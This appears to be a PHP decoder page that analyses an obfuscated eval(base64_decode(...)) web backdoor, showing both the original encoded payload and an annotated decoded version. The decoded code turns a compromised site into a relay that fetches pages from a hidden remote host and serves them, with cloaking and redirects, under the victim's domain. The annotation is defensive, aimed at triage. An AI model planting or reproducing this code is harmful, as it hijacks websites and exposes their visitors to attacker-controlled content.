PHP Decode
<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2cvNTg0NTkzMzQ5MDEzMTg..
Decoded Output download
// Decoded payload of the eval(base64_decode(...)) wrapper shown under "Original Code".
// What the visible code does: it turns the hosting site into a relay. The request's
// query string is taken as a page name, that page is fetched with cURL from a remote
// base URL hidden in $lru, and the response body is echoed (or the redirect replayed)
// to the visitor from this site's own origin.
// Triage notes for defenders: compare the carrying file against a known-good copy,
// search the docroot for the same wrapper, and review outbound HTTP from the web server.

// Turns off PHP error reporting for the rest of the request.
error_reporting(0);

// Remote base URL in a lightly obfuscated form. The "gg" prefix marks the encoded
// variant; only every 4th character, read from the end, is used, and the three digits
// after each of those characters are never read. The tail groups h345, t807, t160,
// p256, :691 already show that the result starts with "http:".
$lru = "gg/58459334901318928471798/122s543r844o858d520-5082168n445i821a581m204/918n871o216t189t961u962b613d811e694r369/575m182o497c564.667t430s465o757h277-263p780w721-107n638i241m516d707a587/337/289:691p256t160t807h345";
$url = '';
if (substr($lru, 0, 2)=='gg') {
    // $x starts at strlen($lru), one past the last character, so the first substr()
    // contributes nothing; every later step moves back 4 and appends one character.
    for($x=strlen($lru);$x>0;$x-=4) $url .= substr($lru,$x,1);
} else $url = $lru; // a value without the "gg" prefix is used as a plain URL

// Extension forced onto simple page names before they are requested upstream.
$e = '.php';
// Name of the GET parameter that carries the page name. It is empty here, so the
// whole raw query string is used instead.
$q = "";
// Probe token: a request whose query string equals it gets the literal reply "OK".
// NOTE(review): presumably used to check that a copy is installed; the token in web
// access logs is a usable indicator when hunting for further copies.
$test = 'suka-test';

// $a is assigned inside the condition. It must start with any character other than
// "/" and continue with one or more of letters, digits, "-", "_", "/" and ".".
// With an empty or non-matching query string none of the code below runs.
if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])) {
    if($test && $a == $test) {
        echo 'OK';
        exit;
    }
    // $w is the upstream page name: a single-segment name (optionally ending in .php,
    // .html or "/") is rewritten to name + $e; anything else is passed through as is.
    // $h receives preg_replace()'s replacement count (0 when $a was left unchanged).
    curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h))), CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Redirects are not followed by cURL; the 301/302 branch below handles them by hand.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    // The visitor's own User-Agent and Referer are forwarded to the remote host.
    // NOTE(review): that gives the remote side what it needs to answer crawlers and
    // people differently (cloaking) - inferred, the remote logic is not visible here.
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
    if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
    $result = curl_exec($ch);
    if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL))) {
        // Upstream answered with a redirect. The chain is walked hop by hop with a
        // fixed "Opera" User-Agent and a Google Referer, reading each response's
        // headers for "Location:". The walk starts at the URL just requested and
        // stops at the first response that carries no Location header.
        // There is no hop limit and no cURL timeout set in this code, so a redirect
        // cycle on the remote side keeps this loop running.
        $end = FALSE;
        $rd = $u;
        while ($end===FALSE) {
            curl_setopt($cht = curl_init($rd), CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($cht, CURLOPT_HEADER, 1);
            curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);
            curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');
            curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');
            $rrt = curl_exec($cht);
            // $u is reassigned here but not read again in the visible code.
            $u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);
            if (preg_match('#Location\: ([\S]+)#si',$rrt,$rdr)) {
                $rd = $rdr[1];
            } else {
                $end = TRUE;
                break;
            }
        }
        // The visitor is redirected to the last URL of the chain with the upstream
        // status code. $rd is taken from a remote response header, so the destination
        // is chosen by whoever controls the remote host.
        header('Location: ' . $rd, true, $c);
        exit;
    } else if ($c == 200 && $result) {
        // Relay the upstream Content-Type and drop everything before the first "<html".
        header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
        $result = preg_replace('#^.*?\<html#si','<html',$result);
        // The remote body is echoed without escaping into a response from this origin,
        // so the remote host controls the markup and script served under this site's
        // domain. Links are rewritten only when the page name was normalised ($h is
        // non-zero) or a .css file was requested; otherwise the body goes out as is.
        // PHP evaluates the arguments of the outer preg_replace() left to right:
        // the pattern assigns $t, the replacement reassigns $h, and the subject (the
        // two inner preg_replace() calls) then uses $t.
        echo ($h || substr($a, -4) == '.css')
            ?
            // Pattern: <a href> values that already carry the local prefix $t and end
            // in $e. $t is SCRIPT_NAME + "?" (+ "$q=") when REQUEST_URI starts with
            // SCRIPT_NAME, else "/" + REQUEST_URI without the trailing $a; the
            // directory part of $a is appended in both cases.
            preg_replace('/<a(.*?)href=["\'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '/' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i',
            // Replacement: the $e suffix is dropped and, when $a is longer than $w
            // minus $e, the tail of $a (the suffix the visitor used) is put in its place.
            '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>',
            // Subject, step 2: relative href/src values of <a>, <link> and <img> get the
            // prefix $t, so they resolve back through this script.
            preg_replace('/<(a|link|img)(.*?)(href|src)=["\']([^\/][a-z0-9-_\.\/]+)["\'](.*?)>/i', '<$1$2$3="' . $t . '$4"$5>',
            // Subject, step 1: relative url(...) values in CSS background declarations
            // get the same prefix.
            preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result)))
            : $result;
        exit;
    }
}
Original Code
<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2cvNTg0NTkzMzQ5MDEzMTg5Mjg0NzE3OTgvMTIyczU0M3I4NDRvODU4ZDUyMC01MDgyMTY4bjQ0NWk4MjFhNTgxbTIwNC85MThuODcxbzIxNnQxODl0OTYxdTk2MmI2MTNkODExZTY5NHIzNjkvNTc1bTE4Mm80OTdjNTY0LjY2N3Q0MzBzNDY1bzc1N2gyNzctMjYzcDc4MHc3MjEtMTA3bjYzOGkyNDFtNTE2ZDcwN2E1ODcvMzM3LzI4OTo2OTFwMjU2dDE2MHQ4MDdoMzQ1IjsgICR1cmwgPSAnJzsgIGlmIChzdWJzdHIoJGxydSwgMCwgMik9PSdnZycpICAJeyAgCWZvcigkeD1zdHJsZW4oJGxydSk7JHg+MDskeC09NCkgJHVybCAuPSBzdWJzdHIoJGxydSwkeCwxKTsgIAl9ICBlbHNlICR1cmwgPSAkbHJ1OyAgICAkZSA9ICcucGhwJzsgICRxID0gIiI7ICAkdGVzdCA9ICdzdWthLXRlc3QnOyAgaWYgKCghJHEgfHwgaXNzZXQoJF9HRVRbJHFdKSkgJiYgcHJlZ19tYXRjaCgiL15bXlwvXVthLXowLTktX1wvXC5dKyQvaSIsICRhID0gJHEgPyAkX0dFVFskcV0gOiAkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0pKSAgCXsgIAlpZigkdGVzdCAmJiAkYSA9PSAkdGVzdCkgIAkJeyAgCQllY2hvICdPSyc7IGV4aXQ7ICAJCX0gIAljdXJsX3NldG9wdCgkY2ggPSBjdXJsX2luaXQoJHVybC4oJHc9cHJlZ19yZXBsYWNlKCIvXihbYS16MC05LV9dKykoXC5waHB8XC5odG1sfFwvfCkkL2kiLCAnJDEnLiRlLCAkYSwgLTEsICRoKSkpLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDApOyAgCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSk7ICAgIAlpZiAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfUkVGRVJFUiJdKSkgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFRkVSRVIsICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSk7ICAgIAkkcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ICAgIAlpZiAoKCgkYyA9IGN1cmxfZ2V0aW5mbygkY2gsIENVUkxJTkZPX0hUVFBfQ09ERSkpID09IDMwMSB8fCAkYyA9PSAzMDIpICYmICgkdSA9IGN1cmxfZ2V0aW5mbygkY2gsIENVUkxJTkZPX0VGRkVDVElWRV9VUkwpKSkgIAkJeyAgCQkkZW5kID0gRkFMU0U7ICAJCSRyZCA9ICR1OyAgICAJCXdoaWxlICgkZW5kPT09RkFMU0UpICAJCQl7ICAJCQljdXJsX3NldG9wdCgkY2h0ID0gY3VybF9pbml0KCRyZCksIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9IRUFERVIsIDEpOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7ICAJCQljdXJsX3NldG9wdCgkY2h0LCBDVVJMT1BUX1VTRVJBR0VOVCwgJ09wZXJhJyk7ICAJCQljdXJsX3NldG9wdCgkY2h0LCBDVVJMT1BUX1JFRkVSRVIsI
CdodHRwOi8vd3d3Lmdvb2dsZS5jb20nKTsgIAkJCSRycnQgPSBjdXJsX2V4ZWMoJGNodCk7ICAgIAkJCSR1ID0gY3VybF9nZXRpbmZvKCRjaHQsIENVUkxJTkZPX0VGRkVDVElWRV9VUkwpOyAgICAJCQlpZiAocHJlZ19tYXRjaCgnI0xvY2F0aW9uXDogKFtcU10rKSNzaScsJHJydCwkcmRyKSkgIAkJCQl7ICAJCQkJJHJkID0gJHJkclsxXTsJCSAgCQkJCX0gIAkJCWVsc2UgIAkJCQl7ICAJCQkJJGVuZCA9IFRSVUU7ICAJCQkJYnJlYWs7ICAJCQkJfQkJCSAgCQkJfSAgICAJCWhlYWRlcignTG9jYXRpb246ICcgLiAkcmQsIHRydWUsICRjKTsgIAkJZXhpdDsgIAkJfSAgCWVsc2UgaWYgKCRjID09IDIwMCAmJiAkcmVzdWx0KSAgCQl7ICAJCWhlYWRlcignQ29udGVudC1UeXBlOiAnIC4gY3VybF9nZXRpbmZvKCRjaCwgQ1VSTElORk9fQ09OVEVOVF9UWVBFKSk7ICAJCSRyZXN1bHQgPSBwcmVnX3JlcGxhY2UoJyNeLio/XDxodG1sI3NpJywnPGh0bWwnLCRyZXN1bHQpOyAgCQllY2hvICgkaCB8fCBzdWJzdHIoJGEsIC00KSA9PSAnLmNzcycpICAJCQk/ICAJCQlwcmVnX3JlcGxhY2UoJy88YSguKj8paHJlZj1bIlwnXSgnIC4gcHJlZ19xdW90ZSgoJHQgPSAoKCFzdHJuY21wKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAkdCA9ICRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdLCBzdHJsZW4oJHQpKSkgPyAoJHQgLiAnPycgLiAoJHEgPyAkcSAuICc9JyA6ICcnICkpIDogJy8nIC4gc3Vic3RyKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAxLCAtc3RybGVuKCRhKSkpIC4gKChzdWJzdHIoJGEsIC0xKSAhPSAnLycgJiYgKCR5ID0gc3RycnBvcygkYSwgJy8nKSkpID8gc3Vic3RyKCRhLCAwLCAkeSkgLiAnLycgOiAnJyApKSwgJy8nKSAuICdbYS16MC05LV9dKykoJyAuIHByZWdfcXVvdGUoJGUpIC4gJylbIlwnXSguKj8pPi9pJywgJzxhJDFocmVmPSIkMicgLiAoKCRoID0gc3RybGVuKCR3KSAtIHN0cmxlbigkZSkgLSBzdHJsZW4oJGEpKSA8IDAgPyBzdWJzdHIoJGEsICRoKSA6ICIiKSAuICciJDQ+JywgcHJlZ19yZXBsYWNlKCcvPChhfGxpbmt8aW1nKSguKj8pKGhyZWZ8c3JjKT1bIlwnXShbXlwvXVthLXowLTktX1wuXC9dKylbIlwnXSguKj8pPi9pJywgJzwkMSQyJDM9IicgLiAkdCAuICckNCIkNT4nLCBwcmVnX3JlcGxhY2UoJy9iYWNrZ3JvdW5kKC1pbWFnZVw6fFw6KSguKj91cmxcKFsiXCddKShbXlwvXVthLXowLTktX1wuXC9dKykoWyJcJ11cKSkvaScsICdiYWNrZ3JvdW5kJDEkMicgLiAkdCAuICckMyQ0JywgJHJlc3VsdCkpKSAgCQkJOiAgCQkJJHJlc3VsdDsgZXhpdDsgIAkJfSAgCX0gICAg")); ?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 7a2ff765126906c4c4923a74223246d6 |
| Eval Count | 1 |
| Decode Time | 78 ms |